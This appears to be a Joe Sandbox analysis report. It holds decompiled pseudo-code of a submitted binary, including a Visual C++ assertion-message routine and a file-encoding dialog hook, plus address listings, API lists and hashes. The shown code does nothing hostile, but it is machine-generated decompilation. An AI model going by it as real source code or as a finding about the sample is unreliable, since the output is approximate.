                                                                                              0x01359999
                                                                                              0x0135999e
                                                                                              0x013599a3
                                                                                              0x00000000
                                                                                              0x013599a9
                                                                                              0x013599a9
                                                                                              0x013599ae
                                                                                              0x013599b0
                                                                                              0x013599b5
                                                                                              0x013599ba
                                                                                              0x00000000
                                                                                              0x013599c0
                                                                                              0x013599c0
                                                                                              0x013599c5
                                                                                              0x013599c7
                                                                                              0x013599cc
                                                                                              0x013599d1
                                                                                              0x00000000
                                                                                              0x013599d7
                                                                                              0x013599d7
                                                                                              0x013599db
                                                                                              0x013599de
                                                                                              0x013599de
                                                                                              0x013599e1
                                                                                              0x013599e4
                                                                                              0x013599ed
                                                                                              0x013599f3
                                                                                              0x013599f9
                                                                                              0x013599fc
                                                                                              0x013599fc
                                                                                              0x013599ff
                                                                                              0x01359a02
                                                                                              0x01359a0d
                                                                                              0x01359a14
                                                                                              0x01359b1a
                                                                                              0x00000000
                                                                                              0x01359a1a
                                                                                              0x01359a21
                                                                                              0x01359a2a
                                                                                              0x01359a2f
                                                                                              0x01359a34
                                                                                              0x00000000
                                                                                              0x01359a3a
                                                                                              0x01359a3a
                                                                                              0x01359a3f
                                                                                              0x01359a3f
                                                                                              0x01359a41
                                                                                              0x01359a46
                                                                                              0x01359a4b
                                                                                              0x00000000
                                                                                              0x01359a51
                                                                                              0x01359a51
                                                                                              0x01359a56
                                                                                              0x01359a57
                                                                                              0x01359a59
                                                                                              0x01359a5e
                                                                                              0x01359a63
                                                                                              0x00000000
                                                                                              0x01359a69
                                                                                              0x01359a69
                                                                                              0x01359a6e
                                                                                              0x01359a70
                                                                                              0x01359a75
                                                                                              0x01359a7a
                                                                                              0x00000000
                                                                                              0x01359a80
                                                                                              0x01359a80
                                                                                              0x01359a81
                                                                                              0x01359a83
                                                                                              0x01359a88
                                                                                              0x01359a8d
                                                                                              0x00000000
                                                                                              0x01359a93
                                                                                              0x01359a93
                                                                                              0x01359a98
                                                                                              0x01359a9a
                                                                                              0x01359a9f
                                                                                              0x01359aa4
                                                                                              0x00000000
                                                                                              0x01359aaa
                                                                                              0x01359b28
                                                                                              0x01359b29
                                                                                              0x01359b2c
                                                                                              0x01359b33
                                                                                              0x01359b33
                                                                                              0x01359aa4
                                                                                              0x01359a8d
                                                                                              0x01359a7a
                                                                                              0x01359a63
                                                                                              0x01359a4b
                                                                                              0x01359a34
                                                                                              0x01359a14
                                                                                              0x013599d1
                                                                                              0x013599ba
                                                                                              0x013599a3
                                                                                              0x01359957
                                                                                              0x01359940
                                                                                              0x01359929
                                                                                              0x013598b8
                                                                                              0x013598a1
                                                                                              0x01359888
                                                                                              0x01359883
                                                                                              0x0135980a
                                                                                              0x013597e0
                                                                                              0x013597c9
                                                                                              0x01359776
                                                                                              0x01359776
                                                                                              0x01359789
                                                                                              0x01359791
                                                                                              0x01359795
                                                                                              0x0135979a
                                                                                              0x0135979f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135979f
                                                                                              0x01359733
                                                                                              0x01359740
                                                                                              0x01359745
                                                                                              0x0135974a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135974a
                                                                                              0x01359731
                                                                                              0x013596d8
                                                                                              0x013596c1

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01359705
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01359729
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName
                                                                                              • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                                              • API String ID: 4146042529-3261600717
                                                                                              • Opcode ID: 01aedbdd3373729122590f73af6127bf99f885ea665f0911b6b90407a84b5524
                                                                                              • Instruction ID: 07cd4c74dbb8cbf722f23b733712f6b7d7cd552dda841efc2cca8be19b9d0df2
                                                                                              • Opcode Fuzzy Hash: 01aedbdd3373729122590f73af6127bf99f885ea665f0911b6b90407a84b5524
                                                                                              • Instruction Fuzzy Hash: AED10D31A0010AA7EF21AA2D9D49FAF777DDF68F0CF444169EC05D620AF6709E41CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013591F9 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 375COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E013591F9(void* __ebx, unsigned int __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, unsigned int _a16, intOrPtr _a20, unsigned int _a24) {
				signed int _v8;
				char _v11;
				char _v272;
				unsigned int _v276;
				unsigned int _v280;
				signed int _v284;
				intOrPtr* _v288;
				intOrPtr* _v308;
				intOrPtr* _v312;
				intOrPtr _v316;
				signed int _t59;
				void* _t63;
				void* _t69;
				void* _t70;
				signed int _t73;
				void* _t76;
				intOrPtr _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				void* _t116;
				void* _t117;
				void* _t121;
				unsigned int _t123;
				unsigned int _t124;
				void* _t127;
				void* _t129;
				unsigned int _t131;
				void* _t132;
				void* _t133;
				void* _t135;
				intOrPtr* _t138;
				unsigned int _t139;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t143;
				void* _t146;
				void* _t149;
				intOrPtr* _t150;
				void* _t151;
				unsigned int _t152;
				unsigned int _t153;
				intOrPtr _t155;
				void* _t156;
				intOrPtr* _t158;
				intOrPtr* _t160;
				void* _t161;
				signed int _t162;
				void* _t164;
				void* _t165;
				void* _t168;

				_t148 = __edx;
				_t59 =  *0x139e210; // 0xbb40e64e
				_v8 = _t59 ^ _t162;
				_push(__ebx);
				_t131 = _a16;
				_push(__esi);
				_t160 = _a4;
				_push(__edi);
				_t155 = _a8;
				_v288 = _a12;
				_v276 = _a24;
				_t63 = E0135B310(_t160, _t155, "Assertion failed!");
				_t165 = _t164 + 0xc;
				if(_t63 != 0) {
					L62:
					__eflags = 0;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01364C6E();
					asm("int3");
					_push(_t162);
					_push( *_v308);
					_push( *_v312);
					return E0136FC63(_t137, _t148, _t155, _v316);
				} else {
					_t69 = E01370AC9(_t160, _t155, "\n\n");
					_t165 = _t165 + 0xc;
					if(_t69 != 0) {
						goto L62;
					} else {
						_t70 = E01370AC9(_t160, _t155, "Program: ");
						_t165 = _t165 + 0xc;
						if(_t70 != 0) {
							goto L62;
						} else {
							E01354D30(_t155,  &_v272, _t70, 0x105);
							_v284 = _v284 & 0x00000000;
							_t73 =  &_v284;
							__imp__GetModuleHandleExW(6, _v276, _t73);
							_t137 =  &_v272;
							asm("sbb eax, eax");
							_v284 =  ~_t73 & _v284;
							_t76 = E0136DD9A(_t131, _t148, _t155, _t160,  ~_t73 & _v284,  &_v272, 0x105);
							_t168 = _t165 + 0x18;
							if(_t76 != 0) {
								L5:
								_t148 =  &_v272;
								_t138 =  &_v272;
								_v276 = _t138 + 1;
								do {
									_t78 =  *_t138;
									_t138 = _t138 + 1;
								} while (_t78 != 0);
								_t137 = _t138 - _v276;
								if(_t137 + 0xb <= 0x40) {
									L10:
									_t80 = E01370AC9(_t160, _t155, _t148);
									_t165 = _t168 + 0xc;
									if(_t80 != 0) {
										goto L62;
									} else {
										_t81 = E01370AC9(_t160, _t155, "\n");
										_t165 = _t165 + 0xc;
										if(_t81 != 0) {
											goto L62;
										} else {
											_t82 = E01370AC9(_t160, _t155, "File: ");
											_t165 = _t165 + 0xc;
											if(_t82 != 0) {
												goto L62;
											} else {
												_t139 = _t131;
												_t28 = _t139 + 1; // 0x1
												_t148 = _t28;
												do {
													_t83 =  *_t139;
													_t139 = _t139 + 1;
												} while (_t83 != 0);
												_t29 = _t139 - _t148 + 8; // 0x9
												if(_t29 <= 0x40) {
													L36:
													_push(_t131);
													goto L37;
												} else {
													_t152 = _t131;
													_t30 = _t152 + 1; // 0x1
													_t146 = _t30;
													do {
														_t109 =  *_t152;
														_t152 = _t152 + 1;
													} while (_t109 != 0);
													_t153 = _t152 - _t146;
													_t137 = 1;
													_v276 = _t153;
													_v280 = 1;
													_t110 =  *((intOrPtr*)(_t131 + _t153 - 1));
													if(_t110 != 0x5c) {
														_t35 = _t131 - 1; // -1
														_t158 = _t35 + _t153;
														while(_t110 != 0x2f && _t137 < _t153) {
															_t137 = _t137 + 1;
															_t158 = _t158 - 1;
															_t110 =  *_t158;
															if(_t110 != 0x5c) {
																continue;
															}
															break;
														}
														_t155 = _a8;
														_v280 = _t137;
													}
													_t148 = _t153 - _t137;
													if(_t153 - _t137 <= 0x26) {
														if(__eflags >= 0) {
															goto L26;
														} else {
															_t137 = _t137 >> 1;
															__eflags = _t137;
															_v280 = _t137;
															goto L33;
														}
													} else {
														if(_t137 < 0x12) {
															L33:
															_t121 = 0x35;
															_push(_t121 - _t137);
															_t123 = E01370B9F(_t137, _t160, _t155, _t131);
															_t165 = _t165 + 0x10;
															__eflags = _t123;
															if(_t123 != 0) {
																goto L62;
															} else {
																_t124 = E01370AC9(_t160, _t155, "...");
																_t165 = _t165 + 0xc;
																__eflags = _t124;
																if(_t124 != 0) {
																	goto L62;
																} else {
																	_t131 = _t131 - _v280 + _v276;
																	__eflags = _t131;
																	goto L36;
																}
															}
														} else {
															L26:
															_push(0x23);
															_t111 = E01370B9F(_t137, _t160, _t155, _t131);
															_t165 = _t165 + 0x10;
															if(_t111 != 0) {
																goto L62;
															} else {
																_t112 = E01370AC9(_t160, _t155, "...");
																_t165 = _t165 + 0xc;
																if(_t112 != 0) {
																	goto L62;
																} else {
																	_push(8);
																	_t116 = E01370B9F(_t137, _t160, _t155, _t131 - _v280 + _v276);
																	_t165 = _t165 + 0x10;
																	if(_t116 != 0) {
																		goto L62;
																	} else {
																		_t117 = E01370AC9(_t160, _t155, "...");
																		_t165 = _t165 + 0xc;
																		if(_t117 != 0) {
																			goto L62;
																		} else {
																			_push(_v276 + 0xfffffff9 + _t131);
																			L37:
																			_push(_t155);
																			_push(_t160);
																			_t85 = E01370AC9();
																			_t165 = _t165 + 0xc;
																			if(_t85 != 0) {
																				goto L62;
																			} else {
																				_t86 = E01370AC9(_t160, _t155, "\n");
																				_t165 = _t165 + 0xc;
																				if(_t86 != 0) {
																					goto L62;
																				} else {
																					_t87 = E01370AC9(_t160, _t155, "Line: ");
																					_t165 = _t165 + 0xc;
																					if(_t87 != 0) {
																						goto L62;
																					} else {
																						_t140 = _t160;
																						_t149 = _t140 + 1;
																						do {
																							_t88 =  *_t140;
																							_t140 = _t140 + 1;
																						} while (_t88 != 0);
																						_t137 = _t140 - _t149;
																						_t150 = _t160;
																						_t132 = _t150 + 1;
																						do {
																							_t89 =  *_t150;
																							_t150 = _t150 + 1;
																						} while (_t89 != 0);
																						_t148 = _t150 - _t132;
																						_t93 = E013704A3(_t137, _a20, _t160 + _t150 - _t132, _t155 - _t137, 0xa);
																						_t165 = _t165 + 0x10;
																						if(_t93 != 0) {
																							goto L62;
																						} else {
																							_t94 = E01370AC9(_t160, _t155, "\n\n");
																							_t165 = _t165 + 0xc;
																							if(_t94 != 0) {
																								goto L62;
																							} else {
																								_t95 = E01370AC9(_t160, _t155, "Expression: ");
																								_t165 = _t165 + 0xc;
																								if(_t95 != 0) {
																									goto L62;
																								} else {
																									_t141 = _t160;
																									_t151 = _t141 + 1;
																									do {
																										_t96 =  *_t141;
																										_t141 = _t141 + 1;
																									} while (_t96 != 0);
																									_t148 = _t141 - _t151 + 0xb0;
																									_t143 = _v288;
																									_t133 = _t143 + 1;
																									do {
																										_t97 =  *_t143;
																										_t143 = _t143 + 1;
																									} while (_t97 != 0);
																									_t137 = _t143 - _t133;
																									if(_t143 - _t133 + _t148 <= _t155) {
																										_push(_v288);
																										goto L54;
																									} else {
																										_push(_t155 - _t148 - 3);
																										_t108 = E01370B9F(_t137, _t160, _t155, _v288);
																										_t165 = _t165 + 0x10;
																										if(_t108 != 0) {
																											goto L62;
																										} else {
																											_push("...");
																											L54:
																											_push(_t155);
																											_push(_t160);
																											_t99 = E01370AC9();
																											_t165 = _t165 + 0xc;
																											if(_t99 != 0) {
																												goto L62;
																											} else {
																												_t134 = "\n\n";
																												_t100 = E01370AC9(_t160, _t155, "\n\n");
																												_t165 = _t165 + 0xc;
																												if(_t100 != 0) {
																													goto L62;
																												} else {
																													_t101 = E01370AC9(_t160, _t155, "For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																													_t165 = _t165 + 0xc;
																													if(_t101 != 0) {
																														goto L62;
																													} else {
																														_t102 = E01370AC9(_t160, _t155, _t134);
																														_t165 = _t165 + 0xc;
																														if(_t102 != 0) {
																															goto L62;
																														} else {
																															_t103 = E01370AC9(_t160, _t155, "(Press Retry to debug the application - JIT must be enabled)");
																															_t165 = _t165 + 0xc;
																															if(_t103 != 0) {
																																goto L62;
																															} else {
																																_pop(_t156);
																																_pop(_t161);
																																_pop(_t135);
																																return L01353E0D(_t103, _t135, _v8 ^ _t162, _t148, _t156, _t161);
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_v276 = _t137;
									_t127 = E01358BD5(_t137,  &_v11 - _t137, "...", 3);
									_t165 = _t168 + 0x10;
									if(_t127 != 0) {
										goto L62;
									} else {
										_t148 = _v276;
										goto L10;
									}
								}
							} else {
								_t129 = E0135B310( &_v272, 0x105, "<program name unknown>");
								_t165 = _t168 + 0xc;
								if(_t129 != 0) {
									goto L62;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}











































































                                                                                              0x013591f9
                                                                                              0x01359204
                                                                                              0x0135920b
                                                                                              0x01359211
                                                                                              0x01359212
                                                                                              0x01359215
                                                                                              0x01359216
                                                                                              0x01359219
                                                                                              0x0135921a
                                                                                              0x01359222
                                                                                              0x0135922d
                                                                                              0x01359233
                                                                                              0x01359238
                                                                                              0x0135923d
                                                                                              0x0135960e
                                                                                              0x0135960e
                                                                                              0x01359610
                                                                                              0x01359611
                                                                                              0x01359612
                                                                                              0x01359613
                                                                                              0x01359614
                                                                                              0x01359615
                                                                                              0x0135961a
                                                                                              0x0135961d
                                                                                              0x01359623
                                                                                              0x01359628
                                                                                              0x01359636
                                                                                              0x01359243
                                                                                              0x0135924a
                                                                                              0x0135924f
                                                                                              0x01359254
                                                                                              0x00000000
                                                                                              0x0135925a
                                                                                              0x01359261
                                                                                              0x01359266
                                                                                              0x0135926b
                                                                                              0x00000000
                                                                                              0x01359271
                                                                                              0x0135927e
                                                                                              0x01359283
                                                                                              0x0135928a
                                                                                              0x0135929c
                                                                                              0x013592a4
                                                                                              0x013592af
                                                                                              0x013592b9
                                                                                              0x013592bf
                                                                                              0x013592c4
                                                                                              0x013592c9
                                                                                              0x013592ec
                                                                                              0x013592ec
                                                                                              0x013592f2
                                                                                              0x013592f7
                                                                                              0x013592fd
                                                                                              0x013592fd
                                                                                              0x013592ff
                                                                                              0x01359300
                                                                                              0x01359304
                                                                                              0x01359310
                                                                                              0x01359343
                                                                                              0x01359346
                                                                                              0x0135934b
                                                                                              0x01359350
                                                                                              0x00000000
                                                                                              0x01359356
                                                                                              0x0135935d
                                                                                              0x01359362
                                                                                              0x01359367
                                                                                              0x00000000
                                                                                              0x0135936d
                                                                                              0x01359374
                                                                                              0x01359379
                                                                                              0x0135937e
                                                                                              0x00000000
                                                                                              0x01359384
                                                                                              0x01359384
                                                                                              0x01359386
                                                                                              0x01359386
                                                                                              0x01359389
                                                                                              0x01359389
                                                                                              0x0135938b
                                                                                              0x0135938c
                                                                                              0x01359392
                                                                                              0x01359398
                                                                                              0x013594a7
                                                                                              0x013594a7
                                                                                              0x00000000
                                                                                              0x0135939e
                                                                                              0x0135939e
                                                                                              0x013593a0
                                                                                              0x013593a0
                                                                                              0x013593a3
                                                                                              0x013593a3
                                                                                              0x013593a5
                                                                                              0x013593a6
                                                                                              0x013593aa
                                                                                              0x013593ae
                                                                                              0x013593af
                                                                                              0x013593b5
                                                                                              0x013593bb
                                                                                              0x013593c1
                                                                                              0x013593c3
                                                                                              0x013593c6
                                                                                              0x013593c8
                                                                                              0x013593d0
                                                                                              0x013593d1
                                                                                              0x013593d2
                                                                                              0x013593d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013593d6
                                                                                              0x013593d8
                                                                                              0x013593db
                                                                                              0x013593db
                                                                                              0x013593e1
                                                                                              0x013593e6
                                                                                              0x01359461
                                                                                              0x00000000
                                                                                              0x01359463
                                                                                              0x01359463
                                                                                              0x01359463
                                                                                              0x01359465
                                                                                              0x00000000
                                                                                              0x01359465
                                                                                              0x013593e8
                                                                                              0x013593eb
                                                                                              0x0135946b
                                                                                              0x0135946d
                                                                                              0x01359470
                                                                                              0x01359474
                                                                                              0x01359479
                                                                                              0x0135947c
                                                                                              0x0135947e
                                                                                              0x00000000
                                                                                              0x01359484
                                                                                              0x0135948b
                                                                                              0x01359490
                                                                                              0x01359493
                                                                                              0x01359495
                                                                                              0x00000000
                                                                                              0x0135949b
                                                                                              0x013594a1
                                                                                              0x013594a1
                                                                                              0x00000000
                                                                                              0x013594a1
                                                                                              0x01359495
                                                                                              0x013593ed
                                                                                              0x013593ed
                                                                                              0x013593ed
                                                                                              0x013593f2
                                                                                              0x013593f7
                                                                                              0x013593fc
                                                                                              0x00000000
                                                                                              0x01359402
                                                                                              0x01359409
                                                                                              0x0135940e
                                                                                              0x01359413
                                                                                              0x00000000
                                                                                              0x01359419
                                                                                              0x01359427
                                                                                              0x0135942c
                                                                                              0x01359431
                                                                                              0x01359436
                                                                                              0x00000000
                                                                                              0x0135943c
                                                                                              0x01359443
                                                                                              0x01359448
                                                                                              0x0135944d
                                                                                              0x00000000
                                                                                              0x01359453
                                                                                              0x0135945e
                                                                                              0x013594a8
                                                                                              0x013594a8
                                                                                              0x013594a9
                                                                                              0x013594aa
                                                                                              0x013594af
                                                                                              0x013594b4
                                                                                              0x00000000
                                                                                              0x013594ba
                                                                                              0x013594c1
                                                                                              0x013594c6
                                                                                              0x013594cb
                                                                                              0x00000000
                                                                                              0x013594d1
                                                                                              0x013594d8
                                                                                              0x013594dd
                                                                                              0x013594e2
                                                                                              0x00000000
                                                                                              0x013594e8
                                                                                              0x013594e8
                                                                                              0x013594ea
                                                                                              0x013594ed
                                                                                              0x013594ed
                                                                                              0x013594ef
                                                                                              0x013594f0
                                                                                              0x013594f4
                                                                                              0x013594f6
                                                                                              0x013594f8
                                                                                              0x013594fb
                                                                                              0x013594fb
                                                                                              0x013594fd
                                                                                              0x013594fe
                                                                                              0x01359502
                                                                                              0x01359512
                                                                                              0x01359517
                                                                                              0x0135951c
                                                                                              0x00000000
                                                                                              0x01359522
                                                                                              0x01359529
                                                                                              0x0135952e
                                                                                              0x01359533
                                                                                              0x00000000
                                                                                              0x01359539
                                                                                              0x01359540
                                                                                              0x01359545
                                                                                              0x0135954a
                                                                                              0x00000000
                                                                                              0x01359550
                                                                                              0x01359550
                                                                                              0x01359552
                                                                                              0x01359555
                                                                                              0x01359555
                                                                                              0x01359557
                                                                                              0x01359558
                                                                                              0x0135955e
                                                                                              0x01359564
                                                                                              0x0135956a
                                                                                              0x0135956d
                                                                                              0x0135956d
                                                                                              0x0135956f
                                                                                              0x01359570
                                                                                              0x01359574
                                                                                              0x0135957b
                                                                                              0x013595f7
                                                                                              0x00000000
                                                                                              0x0135957d
                                                                                              0x01359584
                                                                                              0x0135958d
                                                                                              0x01359592
                                                                                              0x01359597
                                                                                              0x00000000
                                                                                              0x01359599
                                                                                              0x01359599
                                                                                              0x0135959e
                                                                                              0x0135959e
                                                                                              0x0135959f
                                                                                              0x013595a0
                                                                                              0x013595a5
                                                                                              0x013595aa
                                                                                              0x00000000
                                                                                              0x013595ac
                                                                                              0x013595ac
                                                                                              0x013595b4
                                                                                              0x013595b9
                                                                                              0x013595be
                                                                                              0x00000000
                                                                                              0x013595c0
                                                                                              0x013595c7
                                                                                              0x013595cc
                                                                                              0x013595d1
                                                                                              0x00000000
                                                                                              0x013595d3
                                                                                              0x013595d6
                                                                                              0x013595db
                                                                                              0x013595e0
                                                                                              0x00000000
                                                                                              0x013595e2
                                                                                              0x013595e9
                                                                                              0x013595ee
                                                                                              0x013595f3
                                                                                              0x00000000
                                                                                              0x013595f5
                                                                                              0x01359602
                                                                                              0x01359603
                                                                                              0x01359606
                                                                                              0x0135960d
                                                                                              0x0135960d
                                                                                              0x013595f3
                                                                                              0x013595e0
                                                                                              0x013595d1
                                                                                              0x013595be
                                                                                              0x013595aa
                                                                                              0x01359597
                                                                                              0x0135957b
                                                                                              0x0135954a
                                                                                              0x01359533
                                                                                              0x0135951c
                                                                                              0x013594e2
                                                                                              0x013594cb
                                                                                              0x013594b4
                                                                                              0x0135944d
                                                                                              0x01359436
                                                                                              0x01359413
                                                                                              0x013593fc
                                                                                              0x013593eb
                                                                                              0x013593e6
                                                                                              0x01359398
                                                                                              0x0135937e
                                                                                              0x01359367
                                                                                              0x01359312
                                                                                              0x0135931e
                                                                                              0x0135932d
                                                                                              0x01359332
                                                                                              0x01359337
                                                                                              0x00000000
                                                                                              0x0135933d
                                                                                              0x0135933d
                                                                                              0x00000000
                                                                                              0x0135933d
                                                                                              0x01359337
                                                                                              0x013592cb
                                                                                              0x013592dc
                                                                                              0x013592e1
                                                                                              0x013592e6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013592e6
                                                                                              0x013592c9
                                                                                              0x0135926b
                                                                                              0x01359254

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0135929C
                                                                                                • Part of subcall function 0136DD9A: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0136DDBF
                                                                                                • Part of subcall function 0136DD9A: GetLastError.KERNEL32 ref: 0136DDC9
                                                                                                • Part of subcall function 0136DD9A: __dosmaperr.LIBCMT ref: 0136DDD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$ErrorFileHandleLastName__dosmaperr
                                                                                              • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                                                                                              • API String ID: 4185775497-1508414584
                                                                                              • Opcode ID: e5cdbbdd2a9703902f801d31b60e369a775b956b058bb1fd7ab4b145e183980e
                                                                                              • Instruction ID: 1b9d50d4c777b5dde57d84238923d12626e7af296b3280cf813e86fe4f880e61
                                                                                              • Opcode Fuzzy Hash: e5cdbbdd2a9703902f801d31b60e369a775b956b058bb1fd7ab4b145e183980e
                                                                                              • Instruction Fuzzy Hash: B7B12B71A0421DAAEF6A9A2D8C45FEB776D9F96B1CF0401A8FD04D6206F771CB05C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01351870 Relevance: 16.6, APIs: 11, Instructions: 116windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E01351870(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v532;
				signed char _v785;
				signed short _v787;
				long _v792;
				long _v800;
				intOrPtr _v804;
				struct HWND__* _t16;
				struct HWND__* _t18;
				void* _t20;
				long _t21;
				int _t24;
				int _t26;
				int _t30;
				long _t32;
				struct HWND__* _t33;
				void* _t34;
				intOrPtr _t35;
				long _t51;
				void* _t52;
				void* _t53;
				int* _t54;

				_t35 = _a8;
				_t16 = _a4;
				if(_t35 == 0x4e) {
					if( *((intOrPtr*)(_a16 + 8)) != 0xfffffda6 ||  *0x139f938 == 0) {
						L15:
						return 0;
					} else {
						_t18 = GetParent(_t16);
						_t51 =  &_v532;
						SendMessageW(_t18, 0x465, 0, _t51);
						_t54 = _t53 - 0x1c;
						asm("movaps xmm0, [0x1394130]");
						asm("movups [esp+0x4], xmm0");
						 *_t54 = _t51;
						_v800 = 0;
						_v804 = 0x80;
						_t20 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
						if(_t20 == 0xffffffff) {
							goto L15;
						}
						_t52 = _t20;
						_t21 = GetFileSize(_t20, 0);
						if(_t21 == 0xffffffff) {
							CloseHandle(_t52);
							goto L15;
						}
						_t38 =  <  ? _t21 : 0xff;
						_t34 =  &_v787;
						_t24 = ReadFile(_t52, _t34,  <  ? _t21 : 0xff,  &_v792, 0);
						CloseHandle(_t52);
						if(_t24 == 0) {
							goto L15;
						}
						_t26 = _v792;
						if(_t26 < 3 || (_v785 & 0x000000ff ^ 0x000000bf | _v787 & 0x0000ffff ^ 0x0000bbef) != 0) {
							 *_t54 = 0x288;
							IsTextUnicode(_t34, _t26, _t54);
							_t30 =  ==  ?  *_t54 >> 0x00000006 & 0x00000002 : 1;
						} else {
							_t30 = 3;
						}
						 *0x139f934 = _t30;
						SendMessageW( *0x139fdd0, 0x14e, _t30, 0);
						L4:
						goto L15;
					}
				}
				if(_t35 == 0x111) {
					if(_a12 == 0x10191) {
						_t32 = SendMessageW( *0x139fdd0, 0x147, 0, 0);
						_t46 =  !=  ? _t32 : 0;
						 *0x139f934 =  !=  ? _t32 : 0;
					}
					goto L15;
				}
				if(_t35 != 0x110) {
					goto L15;
				}
				_t33 = GetDlgItem(_t16, 0x191);
				 *0x139fdd0 = _t33;
				SendMessageW(_t33, 0x14e,  *0x139f934, 0);
				goto L4;
			}
























                                                                                              0x01351879
                                                                                              0x01351880
                                                                                              0x0135188a
                                                                                              0x013518dc
                                                                                              0x013519fc
                                                                                              0x01351a07
                                                                                              0x013518ef
                                                                                              0x013518f0
                                                                                              0x013518f6
                                                                                              0x01351906
                                                                                              0x0135190c
                                                                                              0x0135190f
                                                                                              0x01351916
                                                                                              0x0135191b
                                                                                              0x0135191e
                                                                                              0x01351926
                                                                                              0x0135192e
                                                                                              0x01351937
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135193d
                                                                                              0x01351942
                                                                                              0x0135194b
                                                                                              0x01351a0b
                                                                                              0x00000000
                                                                                              0x01351a0b
                                                                                              0x0135195b
                                                                                              0x01351962
                                                                                              0x0135196c
                                                                                              0x01351975
                                                                                              0x0135197d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135197f
                                                                                              0x01351986
                                                                                              0x013519a3
                                                                                              0x013519af
                                                                                              0x013519c7
                                                                                              0x01351a13
                                                                                              0x01351a13
                                                                                              0x01351a13
                                                                                              0x01351a18
                                                                                              0x013518c3
                                                                                              0x013518c3
                                                                                              0x00000000
                                                                                              0x013518c3
                                                                                              0x013518dc
                                                                                              0x01351892
                                                                                              0x013519d7
                                                                                              0x013519e8
                                                                                              0x013519f3
                                                                                              0x013519f6
                                                                                              0x013519f6
                                                                                              0x00000000
                                                                                              0x013519d7
                                                                                              0x0135189e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013518aa
                                                                                              0x013518b0
                                                                                              0x013518c3
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 013518AA
                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000), ref: 013518C3
                                                                                              • GetParent.USER32(?), ref: 013518F0
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,?), ref: 01351906
                                                                                              • CreateFileW.KERNEL32 ref: 0135192E
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 01351942
